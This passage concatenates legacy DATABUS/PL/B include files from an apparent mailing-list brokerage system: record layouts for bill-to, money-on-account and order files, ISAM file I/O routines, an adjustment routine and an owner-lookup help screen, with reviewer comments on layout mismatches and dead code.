.ACCKEY DIM 8 1-8 MAILER #1/MAILER #2.
.;.BLANK08 DIM 8 9-16 NOT USED.
.nxngdate DIM 8 9-16 DATE inactivated ccyymmdd
.ENTRY FORM 5 17-21 ENTRY NUMBER. detail entry number for most current detail record
.Flag DIM 1 22-22 " "=normal, "I" = inactive
.;.FLAG DIM 1 22-22 NOT USED.
.................................................
NXNGNAME INIT "NINXNUM.AAM|NINS1:502"
NXNGFLD1 DIM 9
NXNGFLD2 DIM 9
NXNGFILE AFILE FIXED=30
NXNGFLAG FORM 1
NXNGLock FORM 1
ACKEY DIM 12 HOLDS ACCKEY FOR CHECK AFTER READ.
. .............................................................................
.
. ..ACCOUNT MASTER
.
ACCKEY DIM 12 1-12 MAILER #1/MAILER #2.
nxngdate DIM 8 13-20 DATE inactivated ccyymmdd
ENTRY FORM 5 21-25 ENTRY NUMBER. detail entry number for most current detail record
Flag DIM 1 26-26 " "=normal, "I" = inactive
xngfiller dim 4 27-30
.END PATCH 1.1 REPLACED LOGIC
<file_sep>/include/NBILDD.INC
..............................................................................
.
. NBILDD INCLUSION
. NIN BILL-TO FILE DEFINITION
.
. Include-only member: bill-to address record for NINBIL.
. The IFNZ/IFZ PC conditional picks the AFILE declaration per
. platform (both branches are currently identical).
.
. FILE NAME : NINBIL
. REC LENGTH: 130 FIXED
. INDEX KEY : 2-9 (4 POSITION MLR#, 3 POSITION CONTACT#, 1 POSITION BILL#)
.
..............................................................................
.
NBILFILE IFILE KEYLEN=8,FIX=130
IFNZ PC
NBILFIL2 AFILE FIX=130
XIF
IFZ PC
.NBILFIL2 AFILE 51,1,,FIX=130
NBILFIL2 AFILE FIX=130
XIF
NBILFLE3 FILE FIXED=130
NBILNAME INIT "NINBIL "
NBILFLD DIM 8
NBILFLAG FORM 1
NBILFLD1 DIM 53
NBILFLG2 FORM 1
NBILFLG3 FORM 1
NBILPATH FORM 1
.
BILFIL1 DIM 1 001-001 FILLER
BILMLR DIM 4 002-005 MAILER COMPANY NUMBER
BILCNT DIM 3 006-008 MAILER CONTACT NUMBER
BILCODE DIM 1 009-009 BILL-TO NUMBER
BILNAME DIM 25 010-034 CONTACT NAME
BILCOMP DIM 25 035-059 COMPANY NAME
BILADDR DIM 25 060-084 ADDRESS
BILCITY DIM 15 085-099 CITY
BILSTATE DIM 2 100-101 STATE
BILZIP DIM 10 102-111 ZIP CODE
BILUSER DIM 10 112-121 LAST USER TO MODIFY
BILRVDTE DIM 6 122-127 REVISED DATE
BILFIL3 DIM 3 128-130 FILLER
.
..............................................................................
<file_sep>/include/NPGEIO.INC
..............................................................................
.
. NPGEIO INCLUSION
. NIN PAGE.SRT FILE I/O ROUTINES
.
. Keyed routines (KEY/TST/KS/WRT/UPD/DEL) use NPGEFLE2 and
. NPGEOPN2/NPGEFLG2; the sequential routines (SEQ/EOF) use
. NPGEFILE and NPGEOPEN/NPGEFLAG. FILEPI is commented out on
. the read paths, so reads take no record lock.
.
. FILE NAME : PAGE.SRT
. REC LENGTH: 9 VAR
. INDEX KEY : 1-9 (6 BYTE LIST NUMBER + 3 BYTE RECORD #)
.
..............................................................................
.
. ENTRY POINT : NPGEKEY
. REQUIRED : 'NPGEFLD'
. RETURNED : PAGE.SRT RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NPGEKEY
BRANCH NPGEFLG2,NPGE1
CALL NPGEOPN2
NPGE1
trap IOMssg giving Error if IO
. FILEPI 1;NPGEFLE2
READ NPGEFLE2,NPGEFLD;NPGEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGETST
. REQUIRED : NPGEFLD
. RETURNED :
. DESCRIPTION : TEST KEY (record variables left untouched)
.
NPGETST
BRANCH NPGEFLG2,NPGE2
CALL NPGEOPN2
NPGE2
trap IOMssg giving Error if IO
. FILEPI 1;NPGEFLE2
READ NPGEFLE2,NPGEFLD;;
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGEKS
. REQUIRED :
. RETURNED : PAGE.SRT RECORD
. DESCRIPTION : KEY SEQUENTIAL PAGE.SRT FILE READ
.
NPGEKS
BRANCH NPGEFLG2,NPGE3
CALL NPGEOPN2
NPGE3
trap IOMssg giving Error if IO
. FILEPI 1;NPGEFLE2
READKS NPGEFLE2;NPGEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGESEQ
. REQUIRED :
. RETURNED : PAGE.SRT RECORD
. DESCRIPTION : SEQUENTIAL PAGE.SRT FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NPGESEQ
BRANCH NPGEFLAG,NPGE4
CALL NPGEOPEN
NPGE4
trap IOMssg giving Error if IO
. FILEPI 1;NPGEFILE
READ NPGEFILE,SEQ;NPGEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGEWRT
. REQUIRED : 'NPGEFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.NOTE(review): WRITE is issued without an explicit key operand
.(unlike other *WRT routines in this system) -- confirm the
.dialect derives the key from the record here.
.
NPGEWRT
BRANCH NPGEFLG2,NPGE5
CALL NPGEOPN2
NPGE5
trap IOMssg giving Error if IO
FILEPI 1;NPGEFLE2
WRITE NPGEFLE2;NPGEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGEUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
.
NPGEUPD
BRANCH NPGEFLG2,NPGE6
CALL NPGEOPN2
NPGE6
trap IOMssg giving Error if IO
FILEPI 1;NPGEFLE2
UPDATE NPGEFLE2;NPGEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGEDEL
. REQUIRED : 'NPGEFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.NOTE(review): DELETE carries no key operand, so it presumably
.acts on the current record position -- callers must have done
.a prior keyed read; confirm.
.
NPGEDEL
BRANCH NPGEFLG2,NPGE7
CALL NPGEOPN2
NPGE7
trap IOMssg giving Error if IO
FILEPI 1;NPGEFLE2
DELETE NPGEFLE2
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGEEOF
. REQUIRED :
. RETURNED :
. DESCRIPTION : SETS RECORD POINTER TO END OF FILE
.
NPGEEOF
WEOF NPGEFILE,SEQEOF
RETURN
...............................................................................
.
. ENTRY POINT : NPGEOPN2
. REQUIRED : 'NPGEFLG2'
. RETURNED : 'NPGEFLG2' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN PAGE.SRT FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NPGEOPN2
TRAP NPGEGONE giving Error if IO
OPEN NPGEFLE2,NPGENAME
trapclr IO
MOVE C1,NPGEFLG2
RETURN
...............................................................................
.
. ENTRY POINT : NPGEOPEN
. REQUIRED : 'NPGEFLAG'
. RETURNED : 'NPGEFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN PAGE.SRT FILE FOR SEQUENTIAL PROCESSING
.
.
NPGEOPEN
TRAP NPGEGONE giving Error if IO
OPEN NPGEFILE,NPGENAME
MOVE C1,NPGEFLAG
trapclr IO
RETURN
.
.IO trap target: report the missing file via FILEGONE (falls
.through -- FILEGONE presumably aborts; confirm in its source).
NPGEGONE
MOVE NPGENAME,FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/NADJCLIO.inc
; Last change: JS 6 Oct 1999 12:30 pm
..............................................................................
.
. NADJCLIO INCLUSION
. NIN ADJUSTMENT APPLICATION ROUTINE
.
. APPLIES ADJUSTMENT AMOUNTS TO COMPUTED AMOUNTS FROM THE NINVCALC
. ROUTINE IN THE NINVCLIO INCLUSION.
.
. Active logic is now just the ADD statements of the AS* fields
. into the running totals; the commented lines are the old
. CVT-based path kept for reference.
.
..............................................................................
.
NADJCALC
. MOVE ASRECADJ TO CVTFLD
. display *p01:25,"adjar"
. CALL CVT
MOVE ARAMT TO ARJ
ADD asrecadj TO ARamt
. MOVE ARJ TO ARAMT
. ADD NUM102 TO ARWOPP
.
. MOVE ASPAYAD1 TO CVTFLD
. display *p01:25,"adjap1"
. CALL CVT
. MOVE APAMT TO AP1J
. ADD NUM102 TO AP1J
. MOVE AP1J TO APAMT
ADD aspayad1 TO APamt
.
. MOVE ASPAYAD2 TO CVTFLD
. display *p01:25,"adjap2"
. CALL CVT
. MOVE AP2AMT TO AP2J
. ADD NUM102 TO AP2J
. MOVE AP2J TO AP2AMT
ADD aspayad2 TO AP2amt
.begin PLI Patch
. add ASNININC,NInInc
add ASXninc,XNIncamt
ADD aspayad3 TO AP3amt
.end PLI Patch
.
. MOVE ASLRINC TO CVTFLD
. display *p01:25,"adjlrinc"
. CALL CVT
ADD aslrinc TO LRINC
.
. MOVE ADJSTAX TO CVTFLD
. display *p01:25,"adjstax"
. CALL CVT
. ADD NUM102 TO STAX
. ADD NUM102 TO TAXES
..
. MOVE ADJCTAX TO CVTFLD
.| display *p01:25,"adjctax"
.| CALL CVT
. ADD NUM102 TO CTAX
. ADD NUM102 TO TAXES
.
. MOVE ADJPOST TO CVTFLD
. display *p01:25,"adjpost"
. CALL CVT
. ADD NUM102 TO POST
.
RETURN
.
.CVT: legacy string-to-number conversion. All calls above are
.commented out, so this is effectively dead code.
.NOTE(review): the minus-overpunch detection and validity checks
.inside CVT are also commented out, so if CVT were re-enabled
.as-is, control would fall straight through FORMERR/CVTMP to the
.MULTIPLY "-1" line and negate every value unconditionally --
.restore the commented checks before any reuse.
CVT
. ENDSET CVTFLD CHECK LAST BYTE.
. RESET MPCHARS
. SCAN CVTFLD IN MPCHARS IS IT A MINUSOVRPNCH?
. GOTO CVTMP IF EQUAL YES.
. RESET CVTFLD NO.
. TYPE CVTFLD CHECK NUMERIC VALIDITY.
. GOTO CVTOK IF EQUAL ITS OK.
FORMERR
. DISPLAY *P01:24,*EL,*B,"Format error in NADJCALC. ":
. "CVTFLD=",CVTFLD,*W9
. MOVE B10 TO CVTFLD
. RETURN
CVTMP
. REPLACE MPCHANGE IN CVTFLD CHANGE MP TO NUMBER.
. RESET CVTFLD
. TYPE CVTFLD VALID NUMERIC?
. GOTO FORMERR IF NOT EQUAL NO.
MOVE CVTFLD TO NUM10 MOVE INTO NUMERIC.
MULTIPLY "-1" BY NUM10 CHANGE TO MINUS.
MOVE NUM10 TO CVTFLD MOVE BACK TO DIM.
CVTOK MOVE CVTFLD TO NUM102
MULTIPLY ".01" BY NUM102
RETURN
<file_sep>/include/Ownhelp.inc
; Last change: AL 2 Jun 1999 8:04 am
.Interactive help screen: lets the operator find a list-owner
.number by typing (part of) the owner name, then pages through
.AIM matches. Requires the NOWN file routines (NOWNAIM/NOWNKG)
.and npaykey to be available in the including program.
ownhelp DISPLAY *SETSWALL 12:24:40:80;
KEYIN *P1:1,*ES:
*P1:12,*EL,"I WILL HELP YOU FIND THE OWNER NUMBER",*R:
*P1:12,*EL,"THAT YOU WANT":
*R,*P1:12
KEYOWN KEYIN *P1:1,*ES,"TYPE IN OWNER NAME : ":
*P1:2,*T60,OWNOCPY
KEYIN *P1:2,*DV,OWNOCPY,*P1:3,"OK ? ",*T60,str1:
*P1:3,*EL;
CMATCH NO TO str1
GOTO KEYOWN IF EQUAL
CMATCH B1 TO OWNOCPY
GOTO NTENOf IF EQUAL
GOTO NTENOf IF EOS
.Build the AIM free-float search key ("01F" + name + wildcard).
move "01F" to akey1
PACK NOWNFLD2 FROM AKEY1,OWNOCPY,QUES
OWNEADA MATCH "01F" TO AKEY1 *FREE FLOAT SEARCH?
CALL CHKKEY IF EQUAL *YES, CHECK KEY LENGTH
MOVE "*****NO RECORD FOUND*****" TO OWNOCPY
CALL NOWNAIM
GOTO OWNAEXIT IF OVER
GOTO DISOWNA
CHKKEY MOVELPTR NOWNFLD2 TO KEYCOUNT
COMPARE C10 TO KEYCOUNT
GOTO ntenof IF LESS *NOT ENOUGH INFO, LET THEM KNOW
RETURN *OK, RETURN
OWNEADA1 MOVE "*****NO RECORD FOUND*****" TO OWNOCPY
CALL NOWNKG
GOTO OWNAEXIT IF OVER
GOTO DISOWNA
OWNAEXIT
CALL NORECORD
OWNAEXT1 DISPLAY *P1:1,*ES,*RESETSW:
*P20:21,*HON,"ENTER TO EXIT,":
" or (?) FOR HELP",*HOFF;
GOTO DISOWN
.
.Show one matching owner; red highlight when the owner has no
.payment record (npaykey read failed).
DISOWNA
clear npayfld
PACK npayfld FROM ownlon,c0
CALL npaykey
IF over
DISPLAY *P1:09,*EL,"##",OWNLON," ":
*P1:10,OWNLONM,*P1:11,OWNOCPY
KEYIN *P1:13,"TAP ENTER TO CONTINUE, (*) TO END",*T254,str1;
CMATCH "*" TO str1
GOTO OWNAEXT1 IF EQUAL
GOTO OWNEADA1
else
DISPLAY *P1:09,*EL,"##",OWNLON," ":
*P1:10,OWNLONM,*P1:11,*red,OWNOCPY,*white
KEYIN *P1:13,"TAP ENTER TO CONTINUE, (*) TO END",*T254,str1;
CMATCH "*" TO str1
GOTO OWNAEXT1 IF EQUAL
GOTO OWNEADA1
endif
DISOWN
KEYIN *P45:09,*DV,OWNOCPY,*P75:09,"OK?",*T60,str1;
CMATCH NO,str1
GOTO ownhelp IF EQUAL
CMATCH YES,str1
return IF EQUAL
GOTO DISOWN
.
NORECORD MOVE "*****NO RECORD FOUND*****" TO OWNOCPY
DISPLAY *P1:14,*EL,OWNOCPY,*W2,*B,*P1:13,*EL
RETURN
.
.NORETURN: unwinds without returning to the caller -- presumably
.pops back to the caller's own return point; confirm dialect.
ntenof NORETURN
.
NOGOOD
DISPLAY *P1:24,*HON,*EL,*B,"NOT ENOUGH INFORMATION TO SEARCH ON!!!":
*RESETSW:
*P20:21,*HON,"ENTER TO EXIT,":
" or (?) FOR HELP",*HOFF;
PAUSE "3"
return
<file_sep>/include/nmoadd.inc
* *****************************************************************************
* NmoaDD.INC CREATED 30APR92 DLH
* Money-on-account (MOA) detail file: record layout, five file
* views (four keys + sequential), and the reason-code table.
* *****************************************************************************
.
.14 Oct 2010 add reason code 23
.move comments to notes so room for COmpany id
.22Dec2003 Expanded notes into seperate file DLH
.See MoaNotesdd.inc
. 28dec95 on write use actual variables and *zf on brk number. DLh
.10mar95 increase control number to 3 bytes
.17mar94 added brknum
.12may94 added new file by brk/mlr
.
. FILE: NINMOA - DETAIL RECORD FILE.
. LENGTH: 128
.COMPRESS: NONE
. TYPE: ISAM
. KEYS: 1)MLR,ENTRY ? mlr,cnt 1-7
. 2)TRANSNUM 115-121
. 3)brk,mlr 122-125,1-4
. 4)LRNUM 30-35
.
.NMOAFILE IFILE KEYLEN=7,FIXED=119 .mlr/cnt
.NMOAFLE2 IFILE KEYLEN=7,FIXED=119 .transnum
.NMOAFLE3 FILE FIXED=119 .seq
.nmoafle4 ifile keylen=8,fixed=119 .brk/mlr
.nmoafle5 ifile keylen=6,fixed=119 .lrn
NMOAFILE IFILE KEYLEN=7,FIXED=128 .mlr/cnt
NMOAFLE2 IFILE KEYLEN=7,FIXED=128 .transnum
NMOAFLE3 FILE FIXED=128 .seq
nmoafle4 ifile keylen=8,fixed=128 .brk/mlr
nmoafle5 ifile keylen=6,fixed=128 .lrn
NMOANAME INIT "NINMOA "
.START PATCH 01/20/2005 ASH REPLACED LOGIC
.NMOANME1 INIT "\\NINS1\e\data\index\NINMOA "
.NMOANME2 INIT "\\NINS1\e\data\index\NINMOA2 "
.NMOANME3 INIT "\\NINS1\e\data\index\NINMOA "
.NMOANME4 INIT "\\NINS1\e\data\index\NINMOA3 "
.NMOANME5 INIT "\\NINS1\e\data\index\NINMOA4 "
NMOANME1 INIT "NINMOA "
NMOANME2 INIT "NINMOA2 "
NMOANME3 INIT "NINMOA "
NMOANME4 INIT "NINMOA3 "
NMOANME5 INIT "NINMOA4 "
.END PATCH 01/20/2005 ASH REPLACED LOGIC
NMOAPATH FORM 1 1=mlr/cnt,2=transnum,3=seq,4=brk/mlr
. 5=lrn
NMOAFLAG FORM 1
NMOAFLG2 FORM 1
NMOAFLG3 FORM 1
NMOAFLG4 FORM 1
NMOAFLG5 FORM 1
NMOAFLD DIM 7
NMOAFLD4 DIM 8
NMOAFLD5 DIM 6
NMOALOCK FORM 1 0 or 1=File locks, 2= Record locks, 3=no locks
.
.DETAIL RECORD.
...............
moavars list
MLR DIM 4 1-4 CLIENT NUMBER "KEY".
MCNT DIM 3 5-7 MAILER CONTACT NUMBER.
ENTRY FORM 4 8-11 ENTRY NUMBER "KEY".
MBILLTO DIM 1 12-12 MAILER BILL-TO NUMBER.
.TRANDATE DIM 6 13-18 DATE APPLIED/RECEIVED.
TRANDATE DIM 8 13-20 DATE APPLIED/RECEIVED. CCYYMMDD
CONTROL DIM 3 21-23 CONTROL NUMBER.
INVOICE DIM 6 24-29 INVOICE NUMBER.
LRNUM DIM 6 30-35 LIST RENTAL NUMBER.
.INVDATE DIM 6 34-39 INVOICE DATE.
INVDATE DIM 8 36-43 INVOICE DATE. ccyymmdd
ONAMOUNT FORM 7.2 44-53 AMOUNT OUT
.RECDATE DIM 6 50-55 DATE RECORD ENTERED.
RECDATE DIM 8 54-61 DATE RECORD ENTERED. ccyymmdd
INAMOUNT FORM 5.2 62-69 AMOUNT IN
MoaCOmp Dim 1 70-70 'P' if Pacific Lists
MoaFIll Dim 29 71-99
.ONACOM DIM 30 70-99 COMMENTS
REASON FORM 2 100-101 REASON CODE
LIST DIM 6 102-107 LIST NUMBER TO BE APPLIED TO.
CHECKNUM DIM 7 108-114 CHECK NUMBER
TRANSNUM DIM 7 115-121 RECORD ID NUMBER. "KEY".
NMOABRK dim 4 122-125 consultant/broker #. 3/17/94 dlh "key"
NMOAINIT DIM 3 126-128 TYPIST INITIALS .New field
listend
.
.MOA REASON TABLE. Index corresponds to the REASON field value
.(REAS99 = entry correction).
.............
REAS1 INIT "OVERPAYMENT"
REAS2 INIT "UNIDENT. PAYMNT"
REAS3 INIT "INV. CANCELLED"
REAS4 INIT "MISSING"
REAS5 INIT "REFUND"
REAS6 INIT "UNUSED CREDIT"
REAS7 INIT "USING CREDIT"
REAS8 INIT "TRF ENTRY"
REAS9 INIT "ADV PAY POLITIC"
REAS10 INIT "ADV PAY NEW MLR"
REAS11 INIT "PAYMENT ON A/C"
REAS12 INIT "FROM BOOKS"
REAS13 INIT "DUP. PAYMENT"
REAS14 INIT "WRITEOFF"
REAS15 INIT "Short pay"
REAS16 INIT "Canc Check"
REAS17 INIT "Transfer"
REAS18 INIT "Prepayment"
REAS19 INIT "Escrow"
REAS20 INIT "M O A"
REAS21 INIT "Contra"
.begin patch 3.41 Nona0001
REAS22 INIT "LO Income check"
REAS23 INIT "NIN-Discnt/Fees"
.end patch 3.41 Nona0001
REAS99 INIT "ENTRY CORRECTN"
RDESC DIM 15
.
<file_sep>/DEVELOP/Includes - why/nordddash.inc
..............................................................................
.
. NORDDD INCLUSION
. NIN ORDER FILE DEFINITION
.
. FILE NAME : NINORD
. REC LENGTH: 408 FIXED .WAS 294
. INDEX KEY : (1) 7-12 (LR#)
. (2)303-306,7-12 broker/consultant#+lr#
.AIMDEX KEYS: (1) 3-6 (MAILER#)
. (2) 16-21 (LIST#)
. (3) 26-37 (PO#)
. (4) 303-306 (broker/consultant#)
. (5) 22-25 (LIST OWNER)
. (6) 52-63 (MAILER KEY)
. (7) 198-199 (CONTACT)
.NOTE(review): the key positions listed above appear to predate
.the widened layout declared below (e.g. OMLRNUM is now 003-008,
.OBRKNUM 230-235) -- confirm against the live aimdex definitions
.before relying on these numbers.
.............................................................................
.
NORDNAME DIM 28
NORDNME1 INIT "NINORD.ISI|20.20.30.103:502"
NORDNME2 INIT "NINORD.AAM|20.20.30.103:502"
nordnme3 init "NINORDB"
nordnme4 init "NINORDC.ISI|20.20.30.103:502"
NORDFILE IFILE KEYLEN=6,FIXED=408,NODUPLICATES
NORDFLE2 AFILE FIXED=408
NORDFLE4 IFILE KEYLEN=6,FIXED=408
NORDFLD DIM 6
NORDFLD1 DIM 9 nordfle2 AIM KEY 1 MLR
NORDFLD2 DIM 9 nordfle2 AIM KEY 2 LIST
NORDFLD3 DIM 15 nordfle2 AIM KEY 3 MLRPO
nordfld4 dim 9 nordfle2 aim key 4 broker##
nordfld5 DIM 9 .order print file secondary aim key lr
NORDFLD6 DIM 9 nordfle2 AIM KEY 5 LIST OWNER
NORDFLD7 DIM 15 nordfle2 AIM KEY 6 MAILER KEY
NORDFLD8 DIM 5 nordfle2 AIM KEY 7 CONTACT
nordfldC DIM 6 .NORDFLE4 ISAM KEY BASED ON CAMPAIGN NUMBER
NORDFLAG FORM 1
NORDFLG2 FORM 1
NORDFLG4 FORM 1
NORDPATH FORM 1
NORDLOCK FORM 1 0 & 1=FILEPI, 2=REcord lock, 3=no lock
.............................................................................
.
ORCODE DIM 1 001-001 ORDER CODE, "S"
OSTAT DIM 1 002-002 STATUS, 0,B,Q,X,p,x,l,z
OMLRNUM DIM 6 003-008 MAILER NUMBER, AIM KEY 1 UPDATED!!!!!!!!!!!!!!!!
OLRN DIM 9 009-017 LR NUMBER, KEY UPDATED!!!!!!!!!!!!!!!!
OLNUM DIM 6 018-023 LIST NUMBER, AIM KEY 2
OLON DIM 6 024-029 LIST OWNER NUMBER UPDATED!!!!!!!!!!!!!!!!
OMLRPON DIM 12 030-041 MAILER PURCHASE ORDER NUMBER
OQTY DIM 9 042-050 QUANTITY
OMLRKY DIM 12 051-062 MAILER'S KEY
OFOCODE DIM 2 063-064 FURNISHED-ON CODE, 0,1,2,3,4,5,6,7,8,OR 9
ORTNDTEC DIM 2 065-066 RETURN DATE (CENTURY)
ORTNDTEY DIM 2 067-068 RETURN DATE (YEAR)
ORTNDTEM DIM 2 069-070 RETURN DATE (MONTH)
ORTNDTED DIM 2 071-072 RETURN DATE (DAY)
OMDTEC DIM 2 073-074 MAIL DATE (CENTURY)
OMDTEY DIM 2 075-076 MAIL DATE (YEAR)
OMDTEM DIM 2 077-078 MAIL DATE (MONTH)
OMDTED DIM 2 079-080 MAIL DATE (DAY)
OTOCODE DIM 1 081-081 TEST ORDER CODE, "1"
OSOTCODE DIM 1 082-082 SELECTION ON TEST CODE, 1,2 OR 3
.Do continuation items need to be put into a separate file so that we can have numerous be order?
OCCODE DIM 1 083-083 CONTINUATION CODE, "1"
OLRNCO DIM 6 084-089 LR NUMBER OF CONTINUATION CODE
OODTECOC DIM 2 090-091 ORDER DATE OF CONTINUATION CODE (CENTURY)
OODTECOY DIM 2 092-093 ORDER DATE OF CONTINUATION CODE (YEAR)
OODTECOM DIM 2 094-095 ORDER DATE OF CONTINUATION CODE (MONTH)
OODTECOD DIM 2 096-097 ORDER DATE OF CONTINUATION CODE (DAY)
OQTYCO DIM 9 098-106 QUANTITY OF CONTINUATION ORDER, XXX,XXX,XXX
.Can we always use value from Vendor file???
OBildrct DIM 1 107-107 Placed as bill direct? y=yes n=no ' '=no
OBRKGUAR DIM 1 108-108 BROKER GUARANTY, '1' = 30 DAY, '2' =45 DAY, '3' =60 DAY, '4' = NO DATE
OELCODE DIM 1 109-109 ENTIRE LIST CODE 1=RENT/ENTIRE,2=EXCH,3=EXCHANGE/ENTIRE
OODNUM DIM 3 110-112 OFFER DeSCRIPTION NUMBER
ONETQTY DIM 9 113-121 ORDER NET QUANTITY
OCAMP DIM 6 122-127 ASSOCIATED CAMPAIGN
OCLRSTAT DIM 1 128-128 CLEARANCE STATUS 1=EXCHANGE, 2=RENT, 3=EXC/SPLIT, 4=DENIED
OCLRINIT DIM 3 129-131 INITS OF PERSON WHO CLEARED LCR
OBRKRPT DIM 1 132-132 OUTSIDE BROKER NOTIFIED OF CLEARANCE STATUS? 1=YES, B1=NO
OCLRDTEC DIM 2 133-134 CLEAR DATE (CENTURY)
OCLRDTEY DIM 2 135-136 CLEAR DATE (YEAR)
OCLRDTEM DIM 2 137-138 CLEAR DATE (MONTH)
OCLRDTED DIM 2 139-140 CLEAR DATE (DAY)
ORENT DIM 1 141-141 LCR REQUEST FOR RENT "1" = YES
OHIST DIM 1 142-142 ORDER HISTORY "l"-LCR to Live, "L"-In-House LCR to Live, "p"-Pending to Live
ORTNNUM DIM 6 143-148 RETURN-TO NUMBER UPDATED!!!!!!!!!!!!!!!!
OUQTY DIM 9 149-157 UNIVERSE QUANTITY, XXX,XXX,XXX
OSALES10 DIM 1 158-158 TENS DIGIT OF SALESMAN #.
OSALES DIM 1 159-159 ONES DIGIT OF SALESMAN CODE
OCOCODE DIM 2 160-161 CONTACT CODE, 1,2,3, OR 4
OCO2CODE DIM 2 162-163 CONTACT CODE, 1,2,3, OR 4
OODTEC DIM 2 164-165 ORDER DATE (CENTURY)
OODTEY DIM 2 166-167 ORDER DATE (YEAR)
OODTEM DIM 2 168-169 ORDER DATE (MONTH)
OODTED DIM 2 170-171 ORDER DATE (DAY)
OSCODE DIM 1 172-172 SAMPLE CODE, 1,2, OR 3
OCOMSLCT DIM 1 173-173 overlay: COMSELECT='C', lifestyle="L"
OSHP DIM 2 174-175 SHIPPED VIA CODE, 0,1,2...9.
O1DES DIM 35 176-210 LINE #1 OF LIST DESCRIPTION, DATACARD
OREUSE DIM 6 211-216 RE-USE LR #, RTN-TO # WILL BE '0'
ODOWJ DIM 3 217-219 TYPISTS INITIALS was 2
OEXQTY DIM 9 220-228 EXCHANGE QTY ON SPLIT ORDER.
GUARCODE DIM 1 229-229 NIN GUARANTY CODE, '1' = 30 DAY.
OBRKNUM DIM 6 230-235 BROKER/CONSULTANT NUMBER. UPDATED!!!!!!!!!!!!!!!!
OBRKCNT DIM 3 236-238 BROKER/CONSULTANT CONTACT NUMBER.
osamcde DIM 3 239-241 sample numbers
onetper DIM 2 242-243 net name percentage (NN = Net Name)
onetrc FORM 3.2 244-249 net name running charge
onetfm DIM 1 250-250 net flag (F)lat'volume', per (M)'net', (N)o deducts allowed by Lo.
onetmin FORM 7 251-257 net name minimum.
.Will eventually be filler
OPPM DIM 5 258-262 PRICE PER THOUSAND, XXX.XX
OXPPM DIM 5 263-267 EXCHANGE PRICE PER THOUSAND, XXX.XX
O2DES DIM 35 268-302 LINE #2 OF LIST DESCRIPTION, KEYIN
.NOTE(review): filler comment says 303-400 but the record is
.FIXED=408 -- positions 401-408 are unaccounted for; confirm.
ofiller DIM 98 303-400
<file_sep>/include/LIncio.inc
..............................................................................
.
. LIncIO LIncUSION
. NIN income report FILE I/O ROUTINES
.
.
..............................................................................
.
. ENTRY POINT : LIncKEY
. REQUIRED : 'LIncFLD'
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
LIncKEY BRANCH LIncFLAG TO LInc1
CALL LIncOPEN
LInc1 trap IOMSSG GIVING ERROR if IO
FILEPI 1;LIncFILE
READ LIncFILE,LIncFLD;LIncVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LIncTST
. REQUIRED : LIncFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
LIncTST BRANCH LIncFLAG TO LInc2
CALL LIncOPEN
LInc2 Branch LincPath to Linc2a,Linc2b
Linc2a trap IOMSSG GIVING ERROR if IO
FILEPI 1;LIncFILE
READ LIncFILE,LIncFLD;STR1
TRAPCLR IO
RETURN
Linc2b trap IOMSSG GIVING ERROR if IO
FILEPI 1;LIncFILE1
READ LIncFILE1,LIncFLD1;STR1
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LIncKS
. REQUIRED :
. DESCRIPTION : KEY SEQUENTIAL RETURN-TO FILE READ
.
. Key-sequential read (READKS): fetches the next record in key order
. into LIncVARS, opening the file on first use.
LIncKS   BRANCH  LIncFLAG TO LInc3
         CALL    LIncOPEN
LInc3    trap    IOMSSG GIVING ERROR if IO
         FILEPI  1;LIncFILE
         READKS  LIncFILE;LIncVARS
         TRAPCLR IO
         RETURN
..............................................................................
.
. ENTRY POINT : LIncSEQ
. REQUIRED :
. RETURNED : RETURN-TO RECORD
. DESCRIPTION : SEQUENTIAL RETURN-TO FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. Physical-sequential read (READ ...,SEQ): next record in file order
. into LIncVARS. Per the header, the caller is responsible for testing
. the I/O flags (e.g. end-of-file) afterwards.
LIncSEQ  BRANCH  LIncFLAG TO LInc4
         CALL    LIncOPEN
LInc4    trap    IOMSSG GIVING ERROR if IO
         FILEPI  1;LIncFILE
         READ    LIncFILE,SEQ;LIncVARS
         TRAPCLR IO
         RETURN
..............................................................................
.
. ENTRY POINT : LIncWRT
. REQUIRED : 'LIncFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
. Insert a new record from LIncVARS (exact ISAM key insert per header;
. the key value is carried inside the record variables).
. NOTE(review): FILEPI names LIncFILE while WRITE targets LIncFList --
. confirm both refer to the same file/filelist in the DD include.
LIncWRT  Branch  LIncFLAG to LInc5
         CALL    LIncOPEN
LInc5    TRAP    IOMSSG GIVING ERROR IF IO
         FILEPI  1;LIncFILE
         WRITE   LIncFList;LIncVARS
         TRAPCLR IO
         RETURN
..............................................................................
.
. ENTRY POINT : LIncUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RETURN-TO FILE
.
. Rewrite the record fetched by the most recent key read (a prior read
. is a stated precondition) with the current contents of LIncVARS.
. NOTE(review): FILEPI on LIncFILE vs UPDATE on LIncFList -- same
. file/filelist naming question as LIncWRT; confirm in the DD include.
LIncUPD  BRANCH  LIncFLAG TO LInc6
         CALL    LIncOPEN
LInc6    TRAP    IOMSSG GIVING ERROR IF IO
